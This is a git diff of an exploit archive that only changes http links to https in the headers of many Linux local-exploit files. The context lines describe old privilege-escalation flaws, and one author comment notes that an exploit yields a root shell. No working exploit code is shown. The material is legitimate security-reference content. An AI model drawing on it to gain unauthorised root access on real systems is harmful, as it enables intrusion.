b/exploits/linux/local/21585.c index 658a405b7..339c31fb0 100644 --- a/exploits/linux/local/21585.c +++ b/exploits/linux/local/21585.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5125/info +// source: https://www.securityfocus.com/bid/5125/info Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems. diff --git a/exploits/linux/local/21623.txt b/exploits/linux/local/21623.txt index 40034f93c..b266c09f6 100644 --- a/exploits/linux/local/21623.txt +++ b/exploits/linux/local/21623.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5255/info +source: https://www.securityfocus.com/bid/5255/info Python is an open source, object oriented programming language. The Python Pickle module is provided to convert object variables into a serialized form ("pickling"), and later recover the data back into an object hierarchy ("unpickling"). diff --git a/exploits/linux/local/21624.py b/exploits/linux/local/21624.py index 086200e9a..14153a8d3 100755 --- a/exploits/linux/local/21624.py +++ b/exploits/linux/local/21624.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5257/info +source: https://www.securityfocus.com/bid/5257/info Python is an open source, object oriented programming language. The Python Pickle module is provided to convert object variables into a serialized form ("pickling"), and later recover the data back into an object hierarchy ("unpickling"). diff --git a/exploits/linux/local/21667.c b/exploits/linux/local/21667.c index 5ca057ad5..51b38325a 100644 --- a/exploits/linux/local/21667.c +++ b/exploits/linux/local/21667.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5352/info +// source: https://www.securityfocus.com/bid/5352/info The MM Shared Memory library is reported to be prone to a race condition with regards to temporary files which may enable a local attacker to gain elevated privileges. This issue may reportedly be exploited by an attacker with shell access as the Apache webserver user to gain root privileges on a vulnerable host. diff --git a/exploits/linux/local/21674.c b/exploits/linux/local/21674.c index 91d1d5427..4f7c8257c 100644 --- a/exploits/linux/local/21674.c +++ b/exploits/linux/local/21674.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5367/info +// source: https://www.securityfocus.com/bid/5367/info super is prone to a format string vulnerability. This problem is due to incorrect use of the syslog() function to log error messages. It is possible to corrupt memory by passing format strings through the vulnerable logging function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values. diff --git a/exploits/linux/local/21683.c b/exploits/linux/local/21683.c index 997883456..e9c3d6f5e 100644 --- a/exploits/linux/local/21683.c +++ b/exploits/linux/local/21683.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/5404/info +source: https://www.securityfocus.com/bid/5404/info The qmailadmin utility, developed by Inter7, is vulnerable to a buffer overflow condition. It is meant to run as a CGI program and is typically installed setuid (owned by root on some systems, regular users on others). qmailadmin fails to implement adequate bounds checking when processing an environment variable, resulting in a buffer overrun condition. diff --git a/exploits/linux/local/21700.c b/exploits/linux/local/21700.c index 6f9287323..4fba0b676 100644 --- a/exploits/linux/local/21700.c +++ b/exploits/linux/local/21700.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5437/info +// source: https://www.securityfocus.com/bid/5437/info isdn4linux is a freely available, open source package of isdn compatibility tools. It is available for Linux operating systems. diff --git a/exploits/linux/local/21701.pl b/exploits/linux/local/21701.pl index 03bb54a2d..96744a212 100755 --- a/exploits/linux/local/21701.pl +++ b/exploits/linux/local/21701.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5437/info +source: https://www.securityfocus.com/bid/5437/info isdn4linux is a freely available, open source package of isdn compatibility tools. It is available for Linux operating systems. 
diff --git a/exploits/linux/local/21732.txt b/exploits/linux/local/21732.txt index 2ba6cf710..275bfeee5 100644 --- a/exploits/linux/local/21732.txt +++ b/exploits/linux/local/21732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5526/info +source: https://www.securityfocus.com/bid/5526/info scponly is a freely available, open source restricted secure copy client. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/local/21733.sh b/exploits/linux/local/21733.sh index 28b0f7f04..7c65c3cdd 100755 --- a/exploits/linux/local/21733.sh +++ b/exploits/linux/local/21733.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5529/info +source: https://www.securityfocus.com/bid/5529/info A vulnerability has been reported in Cobalt RaQ that may allow attackers to obtain elevated privileges. The vulnerability exists in the /usr/lib/authenticate utility which is used by Apache for authentication purposes. Reportedly, the utility creates temporary files with predictable names with world-writeable permissions. This vulnerability is further exacerbated by the fact that /usr/lib/authenticate is a setuid root binary. diff --git a/exploits/linux/local/21761.c b/exploits/linux/local/21761.c index 9d8c780ff..32d2e9046 100644 --- a/exploits/linux/local/21761.c +++ b/exploits/linux/local/21761.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5585/info +// source: https://www.securityfocus.com/bid/5585/info Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems. diff --git a/exploits/linux/local/21762.c b/exploits/linux/local/21762.c index cf344919e..4667b9813 100644 --- a/exploits/linux/local/21762.c +++ b/exploits/linux/local/21762.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5585/info +// source: https://www.securityfocus.com/bid/5585/info Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems. diff --git a/exploits/linux/local/21763.txt b/exploits/linux/local/21763.txt index 248a33315..7be36a871 100644 --- a/exploits/linux/local/21763.txt +++ b/exploits/linux/local/21763.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5585/info +source: https://www.securityfocus.com/bid/5585/info Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems. diff --git a/exploits/linux/local/21793.txt b/exploits/linux/local/21793.txt index f8dd69117..6a9af3064 100644 --- a/exploits/linux/local/21793.txt +++ b/exploits/linux/local/21793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5708/info +source: https://www.securityfocus.com/bid/5708/info BRU is a backup and restore utility distributed by The Tolis Group. This problem affects the utility on the Linux platform. diff --git a/exploits/linux/local/21814.c b/exploits/linux/local/21814.c index f0fea6a38..e8163fafd 100644 --- a/exploits/linux/local/21814.c +++ b/exploits/linux/local/21814.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5767/info +// source: https://www.securityfocus.com/bid/5767/info Alsaplayer is a PCM player that utilizes the ALSA libraries and drivers. It is availabe for Linux and Unix platforms. diff --git a/exploits/linux/local/21865.c b/exploits/linux/local/21865.c index c4e57b33b..5c01d5f81 100644 --- a/exploits/linux/local/21865.c +++ b/exploits/linux/local/21865.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5805/info +// source: https://www.securityfocus.com/bid/5805/info Interbase is a SQL database distributed and maintained by Borland. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/local/21871.c b/exploits/linux/local/21871.c index dbc09a05f..6d9b3927e 100644 --- a/exploits/linux/local/21871.c +++ b/exploits/linux/local/21871.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5808/info +// source: https://www.securityfocus.com/bid/5808/info gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/local/21872.c b/exploits/linux/local/21872.c index 46ef04cbe..a7340c9b4 100644 --- a/exploits/linux/local/21872.c +++ b/exploits/linux/local/21872.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5808/info +// source: https://www.securityfocus.com/bid/5808/info gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/local/21980.c b/exploits/linux/local/21980.c index c1e11aac1..606615594 100644 --- a/exploits/linux/local/21980.c +++ b/exploits/linux/local/21980.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/6094/info +source: https://www.securityfocus.com/bid/6094/info Vulnerabilities have been discovered in two files used by Abuse. diff --git a/exploits/linux/local/22002.txt b/exploits/linux/local/22002.txt index c3d3c045f..98f1942fc 100644 --- a/exploits/linux/local/22002.txt +++ b/exploits/linux/local/22002.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6146/info +source: https://www.securityfocus.com/bid/6146/info A vulnerability has been discovered in an application packager shipped with QNX RTOS. It should be noted that the vulnerable packager is installed setuid root by default. diff --git a/exploits/linux/local/22014.c b/exploits/linux/local/22014.c index 599a4bd7c..e5fac62af 100644 --- a/exploits/linux/local/22014.c +++ b/exploits/linux/local/22014.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6166/info +// source: https://www.securityfocus.com/bid/6166/info A vulnerability has been discovered in Traceroute-nanog. It has been reported that Traceroute-nanog contains a buffer overflow condition. diff --git a/exploits/linux/local/22055.txt b/exploits/linux/local/22055.txt index ac9c20a70..a799abc0e 100644 --- a/exploits/linux/local/22055.txt +++ b/exploits/linux/local/22055.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6282/info +source: https://www.securityfocus.com/bid/6282/info An information disclosure vulnerability has been reported for SuidPerl. Reportedly, it is possible for an attacker to determine whether files exist in non-accessible directories. diff --git a/exploits/linux/local/22066.c b/exploits/linux/local/22066.c index e30e4a2b5..ba9233188 100644 --- a/exploits/linux/local/22066.c +++ b/exploits/linux/local/22066.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6314/info +// source: https://www.securityfocus.com/bid/6314/info A format string vulnerability has been discovered in Exim. The problem occurs in the daemon_go() function. By supplying malicious format strings via the command line, it is possible for an attacker to execute arbitrary code with root privileges. diff --git a/exploits/linux/local/22128.c b/exploits/linux/local/22128.c index 99677f469..88fe8ee09 100644 --- a/exploits/linux/local/22128.c +++ b/exploits/linux/local/22128.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6527/info +// source: https://www.securityfocus.com/bid/6527/info A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun. diff --git a/exploits/linux/local/22189.txt b/exploits/linux/local/22189.txt index 0a705a4c4..68625eea7 100644 --- a/exploits/linux/local/22189.txt +++ b/exploits/linux/local/22189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6656/info +source: https://www.securityfocus.com/bid/6656/info mtink is prone to a locally exploitable buffer overflow condition. This is due to insufficient bounds checking of the HOME environment variable. diff --git a/exploits/linux/local/22190.txt b/exploits/linux/local/22190.txt index f94a29a07..a35c083c2 100644 --- a/exploits/linux/local/22190.txt +++ b/exploits/linux/local/22190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6658/info +source: https://www.securityfocus.com/bid/6658/info It has been reported that a buffer overflow in escputil exists. When supplied with excessively long arguments, it is possible to overwrite stack memory. diff --git a/exploits/linux/local/22212.txt b/exploits/linux/local/22212.txt index b1aef42b5..99c3adb68 100644 --- a/exploits/linux/local/22212.txt +++ b/exploits/linux/local/22212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6751/info +source: https://www.securityfocus.com/bid/6751/info A vulnerability has been discovered in QNX Real-Time Operating System. It has been reported that an unauthorized user may access arbitrary files. This is possible by requesting the file through the location that the FAT partition is mounted to. Accessing files in this manner ignores all permissions set by the operating system. 
diff --git a/exploits/linux/local/22233.c b/exploits/linux/local/22233.c index c6f0ac1cb..87a358d0c 100644 --- a/exploits/linux/local/22233.c +++ b/exploits/linux/local/22233.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6806/info +// source: https://www.securityfocus.com/bid/6806/info By passing an overly large string when invoking nethack, it is possible to corrupt memory. diff --git a/exploits/linux/local/22234.c b/exploits/linux/local/22234.c index 2465c63eb..f9143c897 100644 --- a/exploits/linux/local/22234.c +++ b/exploits/linux/local/22234.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6806/info +// source: https://www.securityfocus.com/bid/6806/info By passing an overly large string when invoking nethack, it is possible to corrupt memory. diff --git a/exploits/linux/local/22235.pl b/exploits/linux/local/22235.pl index b850914a6..024463412 100755 --- a/exploits/linux/local/22235.pl +++ b/exploits/linux/local/22235.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6806/info +source: https://www.securityfocus.com/bid/6806/info By passing an overly large string when invoking nethack, it is possible to corrupt memory. diff --git a/exploits/linux/local/22265.pl b/exploits/linux/local/22265.pl index e58aca6c2..a095be7eb 100755 --- a/exploits/linux/local/22265.pl +++ b/exploits/linux/local/22265.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6885/info +source: https://www.securityfocus.com/bid/6885/info It has been reported that cPanels' openwebmail package, distributed as part of the cPanel CGI application, is vulnerable to an external file include vulnerability. Exploitation of this issue may result in local user privilage escalation. diff --git a/exploits/linux/local/22320.c b/exploits/linux/local/22320.c index 613c3d609..8ad9ecaef 100644 --- a/exploits/linux/local/22320.c +++ b/exploits/linux/local/22320.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7002/info +// source: https://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable. diff --git a/exploits/linux/local/22321.c b/exploits/linux/local/22321.c index b6fcce12e..414815d16 100644 --- a/exploits/linux/local/22321.c +++ b/exploits/linux/local/22321.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7002/info +// source: https://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable. diff --git a/exploits/linux/local/22322.c b/exploits/linux/local/22322.c index 11802cf41..fc19a68d3 100644 --- a/exploits/linux/local/22322.c +++ b/exploits/linux/local/22322.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7002/info +// source: https://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable. diff --git a/exploits/linux/local/22323.c b/exploits/linux/local/22323.c index 7ab6c1fa5..94d6ff41c 100644 --- a/exploits/linux/local/22323.c +++ b/exploits/linux/local/22323.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7002/info +// source: https://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable. diff --git a/exploits/linux/local/22326.c b/exploits/linux/local/22326.c index f2b0b0e71..4565d0bc1 100644 
--- a/exploits/linux/local/22326.c +++ b/exploits/linux/local/22326.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7009/info +// source: https://www.securityfocus.com/bid/7009/info It has been reported that a memory allocation issue exists the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially execute code as the user of the file utility. diff --git a/exploits/linux/local/22340.txt b/exploits/linux/local/22340.txt index ff3f8bab5..9c1d94abe 100644 --- a/exploits/linux/local/22340.txt +++ b/exploits/linux/local/22340.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7052/info +source: https://www.securityfocus.com/bid/7052/info A vulnerability has been discovered for MySQL that may allow the mysqld service to start with elevated privileges. diff --git a/exploits/linux/local/22344.txt b/exploits/linux/local/22344.txt index e0efca93e..57b354acd 100644 --- a/exploits/linux/local/22344.txt +++ b/exploits/linux/local/22344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7066/info +source: https://www.securityfocus.com/bid/7066/info It has been reported that the man program does not properly handle some types of input. When a man page is processed that could pose a potential security risk, the program reacts in a way that may open a window of opportunity for an attacker to execute arbitrary commands. diff --git a/exploits/linux/local/22362.c b/exploits/linux/local/22362.c index a530c6163..488c0f368 100644 --- a/exploits/linux/local/22362.c +++ b/exploits/linux/local/22362.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7112/info +source: https://www.securityfocus.com/bid/7112/info A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges. diff --git a/exploits/linux/local/22363.c b/exploits/linux/local/22363.c index 26d629435..8368ecd06 100644 --- a/exploits/linux/local/22363.c +++ b/exploits/linux/local/22363.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7112/info +source: https://www.securityfocus.com/bid/7112/info A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges. diff --git a/exploits/linux/local/22376.txt b/exploits/linux/local/22376.txt index 17f2c698c..d50d7bfc8 100644 --- a/exploits/linux/local/22376.txt +++ b/exploits/linux/local/22376.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7121/info +source: https://www.securityfocus.com/bid/7121/info GNOME Eye of Gnome (EOG) image viewer is prone to a format string vulnerability. This condition may lead to execution of arbitrary code if malicious format specifiers are supplied to the program via the command line. As some utilities may be configured to invoke EOG as the handler for images through a mailcap entry, this may allow for local privilege escalation or possibly remote exploitation. diff --git a/exploits/linux/local/22452.sh b/exploits/linux/local/22452.sh index e74f1be08..30f970d00 100755 --- a/exploits/linux/local/22452.sh +++ b/exploits/linux/local/22452.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7263/info +source: https://www.securityfocus.com/bid/7263/info A vulnerability in ChiTex has been reported that may allow local users to obtain root privileges on vulnerable systems. The vulnerability exists due to the existence of two setuid root binaries that execute the 'cat' program without an absolute path. diff --git a/exploits/linux/local/22456.txt b/exploits/linux/local/22456.txt index 800b7a990..683e1aaa8 100644 --- a/exploits/linux/local/22456.txt +++ b/exploits/linux/local/22456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7272/info +source: https://www.securityfocus.com/bid/7272/info It has been reported that WebC will execute in the directory of a symbolic link from which it is invoked. Because of this, it may be possible for a local user to load a configuration file that enabled dangerous variables. diff --git a/exploits/linux/local/22458.c b/exploits/linux/local/22458.c index 93e05626b..3967627ea 100644 --- a/exploits/linux/local/22458.c +++ b/exploits/linux/local/22458.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7279/info +source: https://www.securityfocus.com/bid/7279/info A weakness has been discovered on various systems that may result in an attacker gaining information pertaining to the existence of inaccessible files. The problem lies in the return times when attempting to access existent and non-existent files. diff --git a/exploits/linux/local/22531.pl b/exploits/linux/local/22531.pl index c956cba42..29ef04c38 100755 --- a/exploits/linux/local/22531.pl +++ b/exploits/linux/local/22531.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7421/info +source: https://www.securityfocus.com/bid/7421/info SAP Database SDBINST has been reported prone to a race condition vulnerability. diff --git a/exploits/linux/local/22538.pl b/exploits/linux/local/22538.pl index 45bfafbd0..e4cef13dc 100755 --- a/exploits/linux/local/22538.pl 
+++ b/exploits/linux/local/22538.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7433/info +source: https://www.securityfocus.com/bid/7433/info Libopt library has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22540.c b/exploits/linux/local/22540.c index 02266ef20..e94981766 100644 --- a/exploits/linux/local/22540.c +++ b/exploits/linux/local/22540.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7437/info +// source: https://www.securityfocus.com/bid/7437/info The linux-atm 'les' executable has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22565.c b/exploits/linux/local/22565.c index e01876e0b..637750b9b 100644 --- a/exploits/linux/local/22565.c +++ b/exploits/linux/local/22565.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7500/info +// source: https://www.securityfocus.com/bid/7500/info MySQL has been reported to implement a weak password encryption algorithm. It has been reported that the MySQL function used to encrypt MySQL passwords makes just one pass over the password and employs a weak left shift based cipher. The hash may be cracked in little time using a bruteforce method. diff --git a/exploits/linux/local/22567.c b/exploits/linux/local/22567.c index 67943c028..2d3da006a 100644 --- a/exploits/linux/local/22567.c +++ b/exploits/linux/local/22567.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7505/info +source: https://www.securityfocus.com/bid/7505/info Multiple vulnerabilities have been reported for Leksbot. The precise nature of these vulnerabilities are currently unknown however, exploitation of this issue may result in an attacker obtaining elevated privileges. This is because in some installations, the Leksbot binary may be installed setuid. */ 
@@ -7,7 +7,7 @@ Multiple vulnerabilities have been reported for Leksbot. The precise nature of t /* by gunzip * KATAXWR/leksbot local root exploit * for Debian Linux 3.0 - * http://www.securityfocus.com/bid/7505 + * https://www.securityfocus.com/bid/7505 * change command if you don't like it (gives a root shell in /tmp/ash) * http://members.xoom.it/gunzip . more to come */ diff --git a/exploits/linux/local/22594.c b/exploits/linux/local/22594.c index ecb3dffd6..8d9c26fa4 100644 --- a/exploits/linux/local/22594.c +++ b/exploits/linux/local/22594.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7565/info +// source: https://www.securityfocus.com/bid/7565/info CDRecord has been reported prone to a format string vulnerability. The issue presents itself due to a programming error that occurs when calling a printf-like function. diff --git a/exploits/linux/local/22616.pl b/exploits/linux/local/22616.pl index 6dbbbcdcc..c309a378e 100755 --- a/exploits/linux/local/22616.pl +++ b/exploits/linux/local/22616.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7632/info +source: https://www.securityfocus.com/bid/7632/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22617.c b/exploits/linux/local/22617.c index cc674a4d4..15d4a0a4d 100644 --- a/exploits/linux/local/22617.c +++ b/exploits/linux/local/22617.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7632/info +// source: https://www.securityfocus.com/bid/7632/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22633.c b/exploits/linux/local/22633.c index 2b494ef82..fc040042f 100644 --- a/exploits/linux/local/22633.c +++ b/exploits/linux/local/22633.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7663/info +// source: https://www.securityfocus.com/bid/7663/info Polymorph for Linux has been reported prone to a buffer overflow vulnerability. 
diff --git a/exploits/linux/local/22640.c b/exploits/linux/local/22640.c index 8e3ca3061..f6bc9ff7a 100644 --- a/exploits/linux/local/22640.c +++ b/exploits/linux/local/22640.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7676/info +// source: https://www.securityfocus.com/bid/7676/info A vulnerability has been discovered in uml_net. Due to integer mismanagement while handling version information, it may be possible for an attacker to execute arbitrary code. Specifically, by supplying a negative value within the version information it is possible to bypass various calculations and cause an invalid indexing into an array of functions. As a result, it is possible for an attacker to execute a function in an attacker-controlled location of memory. diff --git a/exploits/linux/local/22643.pl b/exploits/linux/local/22643.pl index 5bbe189d5..9c28ce57d 100755 --- a/exploits/linux/local/22643.pl +++ b/exploits/linux/local/22643.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7682/info +source: https://www.securityfocus.com/bid/7682/info ifenslave for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22644.c b/exploits/linux/local/22644.c index c858a54ba..767c32a3e 100644 --- a/exploits/linux/local/22644.c +++ b/exploits/linux/local/22644.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7682/info +// source: https://www.securityfocus.com/bid/7682/info ifenslave for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22645.c b/exploits/linux/local/22645.c index 4c461fdfc..24b690b3a 100644 --- a/exploits/linux/local/22645.c +++ b/exploits/linux/local/22645.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7682/info +// source: https://www.securityfocus.com/bid/7682/info ifenslave for Linux has been reported prone to a buffer overflow vulnerability. 
diff --git a/exploits/linux/local/22695.pl b/exploits/linux/local/22695.pl index bf8d1a594..ca939304b 100755 --- a/exploits/linux/local/22695.pl +++ b/exploits/linux/local/22695.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7760/info +source: https://www.securityfocus.com/bid/7760/info A vulnerability has been discovered in the Linux /bin/mail utility. The problem occurs when processing excessive data within the carbon copy field. Due to insufficient bounds checking while parsing this information it may be possible to trigger a buffer overrun. diff --git a/exploits/linux/local/22703.c b/exploits/linux/local/22703.c index 5412bc39f..cace8ce8e 100644 --- a/exploits/linux/local/22703.c +++ b/exploits/linux/local/22703.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7773/info +// source: https://www.securityfocus.com/bid/7773/info Xmame is prone to a locally exploitable buffer overflow. This is due to insufficient bounds checking of the command line parameter used to specify language settings (--lang). Successful exploitation on some systems could result in execution of malicious instructions with elevated privileges. diff --git a/exploits/linux/local/22719.pl b/exploits/linux/local/22719.pl index 55f2f621d..569d0d2c8 100755 --- a/exploits/linux/local/22719.pl +++ b/exploits/linux/local/22719.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7790/info +source: https://www.securityfocus.com/bid/7790/info A buffer overflow vulnerability has been reported for the kon2 utility shipped with various Linux distributions. Exploitation of this vulnerability may result in a local attacker obtaining elevated privileges on a vulnerable system. diff --git a/exploits/linux/local/22720.c b/exploits/linux/local/22720.c index d99d58a4a..eeea4b184 100644 --- a/exploits/linux/local/22720.c +++ b/exploits/linux/local/22720.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7790/info +// source: https://www.securityfocus.com/bid/7790/info A buffer overflow vulnerability has been reported for the kon2 utility shipped with various Linux distributions. Exploitation of this vulnerability may result in a local attacker obtaining elevated privileges on a vulnerable system. diff --git a/exploits/linux/local/22729.c b/exploits/linux/local/22729.c index 9f2104115..c99f510e1 100644 --- a/exploits/linux/local/22729.c +++ b/exploits/linux/local/22729.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7812/info +// source: https://www.securityfocus.com/bid/7812/info A vulnerability has been reported in the man utility. The problem is said to occur due to a format string bug when handling a catalog file. As a result, an attacker may be capable of writing arbitrary values to sensitive locations within process memory. diff --git a/exploits/linux/local/22745.c b/exploits/linux/local/22745.c index 8594fa2b8..aa38d3431 100644 --- a/exploits/linux/local/22745.c +++ b/exploits/linux/local/22745.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7836/info +// source: https://www.securityfocus.com/bid/7836/info A vulnerability has been reported for zblast, an svgalib-based game. The problem occurs when copying data from a user-supplied environment variable into a static memory buffer. By storing excessive data within the variable, it may be possible for an attacker to corrupt process memory, ultimately resulting in the execution of arbitrary code. diff --git a/exploits/linux/local/22748.c b/exploits/linux/local/22748.c index 5f9b7eacd..41fcb132b 100644 --- a/exploits/linux/local/22748.c +++ b/exploits/linux/local/22748.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7838/info +source: https://www.securityfocus.com/bid/7838/info It has been reported that Xaos is vulnerable to a boundary condition error in the command option processing. Because of this, an attacker may be able to gain elevated privileges, potentially compromising the integrity of the host. */ diff --git a/exploits/linux/local/22768.pl b/exploits/linux/local/22768.pl index 3a8d5725e..90fd17eb3 100755 --- a/exploits/linux/local/22768.pl +++ b/exploits/linux/local/22768.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7902/info +source: https://www.securityfocus.com/bid/7902/info atftp is prone to a locally exploitable buffer overflow condition. This issue is due to insufficient bounds checking performed on input supplied to the command line parameter (-t) for "timeout". diff --git a/exploits/linux/local/22773.c b/exploits/linux/local/22773.c index 5f7a58510..03b33812e 100644 --- a/exploits/linux/local/22773.c +++ b/exploits/linux/local/22773.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7916/info +// source: https://www.securityfocus.com/bid/7916/info It has been reported that Progress database does not properly handle untrusted input when opening shared libraries. Specifically, the dlopen() function used by several Progress utilities checks the user's PATH environment variable when including shared object libraries. If any shared objects are found, Progress will load and execute them. Due to this, an attacker may be able to gain unauthorized privileges. diff --git a/exploits/linux/local/22775.txt b/exploits/linux/local/22775.txt index d6a3284dd..404b2af2a 100644 --- a/exploits/linux/local/22775.txt +++ b/exploits/linux/local/22775.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7918/info +source: https://www.securityfocus.com/bid/7918/info A vulnerability has been reported for FreeWnn that may result in an attacker obtaining elevated privileges. 
diff --git a/exploits/linux/local/22781.txt b/exploits/linux/local/22781.txt index f40ac88a2..eeaeec2c6 100644 --- a/exploits/linux/local/22781.txt +++ b/exploits/linux/local/22781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7929/info +source: https://www.securityfocus.com/bid/7929/info A vulnerability has been discovered in the Linux-Pam pam_wheel module. The problem exists in the way the module authenticates users under certain configurations. Specifically, if the module is configured to allow wheel group members to use the 'su' utility without supplying credentials and is not configured to verify the user's UID, it may be possible for a local attacker to elevated privileges. diff --git a/exploits/linux/local/22806.sh b/exploits/linux/local/22806.sh index 68e997108..50f0e6692 100755 --- a/exploits/linux/local/22806.sh +++ b/exploits/linux/local/22806.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7977/info +source: https://www.securityfocus.com/bid/7977/info sdfingerd has been reported prone to a local privilege escalation vulnerability. The issue presents itself because the sdfingerd daemon fails to sufficiently drop group privileges before executing commands that are contained in a users .plan file. diff --git a/exploits/linux/local/22813.c b/exploits/linux/local/22813.c index 5964665c9..8759a565d 100644 --- 